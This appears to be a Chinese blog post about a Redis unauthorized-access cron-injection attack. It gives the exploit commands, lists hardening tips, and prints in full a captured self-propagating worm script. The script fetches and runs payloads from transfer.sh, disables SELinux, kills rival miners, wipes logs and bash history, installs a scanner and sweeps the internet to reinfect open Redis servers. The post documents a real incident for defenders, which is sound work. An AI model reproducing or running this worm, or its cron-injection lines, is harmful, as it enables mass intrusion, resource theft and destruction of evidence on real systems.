又见到一个利用redis漏洞的活生生的例子

最新推荐文章于 2024-04-23 23:45:00 发布
最新推荐文章于 2024-04-23 23:45:00 发布
阅读量2.5k 收藏 1
点赞数 2
分类专栏: java 文章标签: redis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/goldenfish1919/article/details/80339958
版权

又见到一个如何利用redis漏洞的活生生的例子!

原理大概如下:

config set  dir /var/spool/cron

config set dbfilename root

新建cron.txt :

*/1 * * * * ls>/tmp/ls.txt

(echo -e "\t\n";cat cron.txt ;echo -e "\n\t") > cron2.txt

cat cron2.txt | redis-cli -h 10.110.3.62 -a 123456 -x set crackit

save

config set  dir /usr/local/redis/data

config set dbfilename dump.rdb

这样就在目标主机10.110.3.62 上新建了定时任务:*/1 * * * * ls>/tmp/ls.txt。

实在太可怕了!

加固的方法:

(1)port不要使用默认的6379
(2)bind到专用ip
(3)requirepass设置密码
(4)使用无登录权限的用户运行redis
(5)禁用config命令:rename-command config “”

实际是这样的:

redis中写入了3个key:

127.0.0.1:6379>keys *

1) "Backup1"
2) "Backup2"
3) "shiro-activeSessionCache:sc89883e5aiiupk1gpv9cgji0s"

4) "Backup3"

内容是:

1217.0.0.1:6379> get Backup1
"\t\n*/2 * * * * curl -s https://transfer.sh/kZ4a6/tmp.Bf9jz8zvv5 > .cmd && bash .cmd\n\t"
182.254.233.93:6379> get Backup2
"\t\n*/5 * * * * wget -O .cmd https://transfer.sh/kZ4a6/tmp.Bf9jz8zvv5 && bash .cmd\n\t"
182.254.233.93:6379> get Backup3

"\t\n*/10 * * * * lynx -source https://transfer.sh/kZ4a6/tmp.Bf9jz8zvv5 > .cmd && bash .cmd\n\t"

https://transfer.sh/kZ4a6/tmp.Bf9jz8zvv5的内容是:

sleep 1

find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete
[ -f .mxff0 ] && exit 0
echo 0 > .mxff0
trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXIT
setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
crontab -r 2>/dev/null
rm -rf /var/spool/cron 2>/dev/null
grep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.conf
rm -rf /tmp/* 2>/dev/null
rm -rf /var/tmp/* 2>/dev/null
rm -rf /etc/root.sh 2>/dev/null
sync && echo 3 > /proc/sys/vm/drop_caches
cat <<EOF> /etc/security/limits.conf
*         hard    nofile      100000
*         soft    nofile      100000
root      hard    nofile      100000
root      soft    nofile      100000
*         hard    nproc       100000
*         soft    nproc       100000
root      hard    nproc       100000
root      soft    nproc       100000
EOF
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT
ps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; done
rm -rf /tmp/* 2>/dev/null
rm -rf /var/tmp/* 2>/dev/null
echo 0 > /var/spool/mail/root
echo 0 > /var/log/wtmp
echo 0 > /var/log/secure
echo 0 > /root/.bash_history
YUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"
DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"
if cat /etc/*release | grep -i CentOS; then
yum clean all
yum install -y -q epel-release
yum install -y -q $YUM_PACKAGE_NAME
elif cat /etc/*release | grep -qi Red; then
yum clean all
yum install -y -q epel-release
yum install -y -q $YUM_PACKAGE_NAME
elif cat /etc/*release | grep -qi Fedora; then
yum clean all
yum install -y -q epel-release
yum install -y -q $YUM_PACKAGE_NAME
elif cat /etc/*release | grep -qi Ubuntu; then
export DEBIAN_FRONTEND=noninteractive
rm -rf /var/lib/apt/lists/*
apt-get update -q --fix-missing
for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done
elif cat /etc/*release | grep -qi Debian; then
export DEBIAN_FRONTEND=noninteractive
rm -rf /var/lib/apt/lists/*
apt-get update --fix-missing
for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done
elif cat /etc/*release | grep -qi Mint; then
export DEBIAN_FRONTEND=noninteractive
rm -rf /var/lib/apt/lists/*
apt-get update --fix-missing
for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done
elif cat /etc/*release | grep -qi Knoppix; then
export DEBIAN_FRONTEND=noninteractive
rm -rf /var/lib/apt/lists/*
apt-get update --fix-missing
for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done
else
exit 1
fi
sleep 1
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12
sleep 1
[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112
fi
tname=$( mktemp )
OMURL=https://transfer.sh/593aY/tmp.W7zdvCT5JO
curl -s $OMURL > $tname || wget -q -O $tname $OMURL
NMURL=$( curl -s --upload-file $tname https://transfer.sh )
mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg
[ -z "$NMURL" ] && NMURL=$OMURL
ncmd=$(basename $(mktemp))
sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmd
NSURL=$( curl -s --upload-file $ncmd https://transfer.sh )
echo 'flushall' > .dat
echo 'config set dir /var/spool/cron' >> .dat
echo 'config set dbfilename root' >> .dat
echo 'set Backup1 "\t\n*/2 * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat
echo 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .dat
echo 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .dat
echo 'save' >> .dat
echo 'config set dir /var/spool/cron/crontabs' >> .dat
echo 'save' >> .dat
echo 'exit' >> .dat
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
for x in $( seq 1 224 | sort -R ); do
for y in $( seq 0 255 | sort -R ); do
$pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw &
done < .r.$x.$y.l
done
done
echo 0 > /var/spool/mail/root 2>/dev/null
echo 0 > /var/log/wtmp 2>/dev/null
echo 0 > /var/log/secure 2>/dev/null
echo 0 > /root/.bash_history 2>/dev/null
exit 0

注意:https://www.zoomeye.org/searchResult?q=port:6379 这个网站可以查询到redis服务器

参考:https://mp.weixin.qq.com/s/GraCZxIajmy8lsMYAnsfeA


若鱼1919
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
关于Redis未授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis未授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
2021-8-1Redis计划任务反弹shell
qq_45290991的博客
08-01 2168
前段时间忙着毕业,终于现在毕业了,在愉快而紧张地等待毕业前期,我开始了Redis的学习。。。 一、搭建安装配置Redis数据库 我听说在centOS下可以Redis结合计划任务反弹shell成功,Ubuntu貌似不行 ...
网络安全进阶篇(十二章-3)redis攻防总结(上)
划水的小白白
03-28 631
一、redis未授权访问 1.1 定义 1.2 未授权访问原因 1.3 redis服务的搭建 1.4 redis的配置 1.5 加载配置文件启动redis服务 1.6 查看redis服务是否启动 1.7 使用攻击机器测试是否存在未授权 1.8 Redis常用命令 1.9 修复方法见“ 八 ” 二、redis 写webshell 2.1 命令 2.2 访问测试写入的一句马 2.3 执行命令的顺序可以稍微变化 三、redis 密钥登录ssh 3.1 不存在未授权的情况: 3.2 写入root的条件(利用条件)
利用Redis漏洞远程向服务器写入定时任务
kouryoushine的博客
02-25 5444
由于近期阿里云服务器报警redis漏洞,经过调查对黑客的入侵过程进行了整理并模拟一遍,庆幸此次黑客行为未对公司造成影响,同时还让我学习了很多知识,这里分享给大家。 1,被入侵的前提条件 redis没有设置密码 。 redis配置文件没有打开保护模式,并且没有bindIP地址 。 安全组设置打开了redis的6379端口。 以root用户启动redis。 有人可能会问,怎么可能这么傻,连个密码都不...
linux cron 定时任务无效 /var/spool/cron/xxx
烤鸭的世界我们不懂的博客
05-16 6251
大家好,我是烤鸭: 关于配置了/var/spool/cron/root 表达式后无效。 vi/var/spool/cron/root root中内容 0 1/1 * * * ? sh /opt/web_app/sh/check_kibana.sh 单独执行check_kibana.sh 是没有问题的。 应该是cron服务没启动。 参考文章: https:/...
redis利用总结
qq_56426046的博客
09-28 1075
kali安装redis-clikali监听9999端口远程访问不了把protected-mode改成no另一种代码形式。
redis写定时任务获取root权限
repoman的博客
12-09 719
前提: 1.redis由root用户启动。 2.开启cron的时候,/var/spool/cron linux机器下默认的计划任务,linux会定时去执行里面的任务。 启动服务 :/sbin/service crond start 或 /etc/init.d/crond start(centos系列) sudo /etc/init.d/cron start (ubuntu系列) 一.windows下 config set dir /var/spool/cron config set db..
Redis未授权最全利用方式
swordheart的博客
01-10 2430
0x00 利用计划任务反弹shell 靶机地址:192.168.230.142 kail地址:192.168.230.128 启动靶机redis docker环境
漏洞复现----22、Redis未授权访问漏洞
七天
07-15 1658
文章目录一、简介二、漏洞环境三、漏洞复现1、未授权访问2、写入webshell3、利用公私钥获取root权限4、计划任务反弹shell 一、简介 Redis一个开源的使用ANSI C语言编写、支持网络、可基于内存也可以持久化的日执行、Key-Value数据库。 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有添加防火墙规则避免其他非信任来源 ip 访问等策略时,会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户未授权访问 Redis 以及
Redis未授权漏洞环境搭建复现问题解决
身高两米不到的博客
03-17 636
一:搭建环境卸载重装几次,翻看几十篇文章最后复现成功,因此记录一下 环境VMware,两台主机使用NAT模式连接 Kali 192.168.209.129 CentOS7 192.168.209.128 二:CentOS搭建redis,以root权限开启虚机 (1).下载安装包 wget http://download.redis.io/releases/redis-4.0.6.tar.gz 解压 tar -zxvf redis-4.0.6.tar.gz (2).red
Redis 漏洞总结
qq_41696518的博客
06-26 2449
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
一个很好的redis例子
05-30
最近项目需要用到redis,分享一个很好的redis例子,导进eclipse可以直接运行,redis配置可能需要根据自己需求更改下密码。
Redis常见漏洞利用方法总结1
08-03
Redis(Remote Dictionary Server ),即远程字典服务,是个开源的使 ANSI C 语编写、持络、可基于内存亦可持久化的志型、Key-
Redis 配置与使用 (Linux 虚拟机&Windows客户端)
xiongyuqing的博客
04-17 502
springboot2.X 中需要修改 session 配置存储类型:session.store-type: redis。get set session 自动转化为 redis 中存储。可以自动将 session 存储到 redis 中。默认端口号:6379。
Redis中的管道操作pipeline
LuckFairyLuckBaby的博客
04-23 253
Redis 中,Pipeline(管道)是一种客户端与服务器间通信的优化机制,旨在减少网络往返时间和提高命令执行效率。使用 Pipeline 时,客户端不再逐条发送命令,而是将多个命令一次性打包成一个请求包发送给 Redis 服务器。相应地,服务器在接收到这个请求包后,不是立即返回每条命令的执行结果,而是先将所有命令依次执行完毕,然后将所有结果打包成一个响应包返回给客户端。这种做法显著减少了客户端与服务器之间网络通信的次数,尤其是对于需要执行大量命令的场景,能够极大地降低网络延迟带来的影响。
Redis(6)】Redis集群模式配置示例
云游老道的博客
04-20 1061
传统的哨兵模式和主从复制模式虽然提供了基本的高可用性和读写分离,但在面对大规模数据和高并发时显得有点力不从心。本文将探讨Redis集群模式如何打破这些局限,详细介绍其工作原理、配置要求,以及启动和监控策略。
【内附完整redis配置文件】linux服务器命令设置redis最大限制内存大小,设置redis内存回收机制,redis有哪些回收机制
最新发布
G佳伟
04-23 351
redis经常出现进程自己挂掉,经排查后是因为redis占用内存过大,导致服务器内存爆满进程自己挂掉。
Redis中的慢查询日志和监视器
Cover_sky的博客
04-22 758
OK每当一个客户端服务器发送一条命令请求时,服务器除了会处理这条命令请求之外,还会将关于这条命令请求的信息发送给所有监视器,如图所示。
redis 漏洞利用
09-30
redis 漏洞利用可以通过redis-rogue-server工具来实现。该工具适用于目标存在Redis未授权访问漏洞时使用,无法对Redis密码进行认证。你可以从https://github.com/n0b0dyCN/redis-rogue-server下载该工具。请注意,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值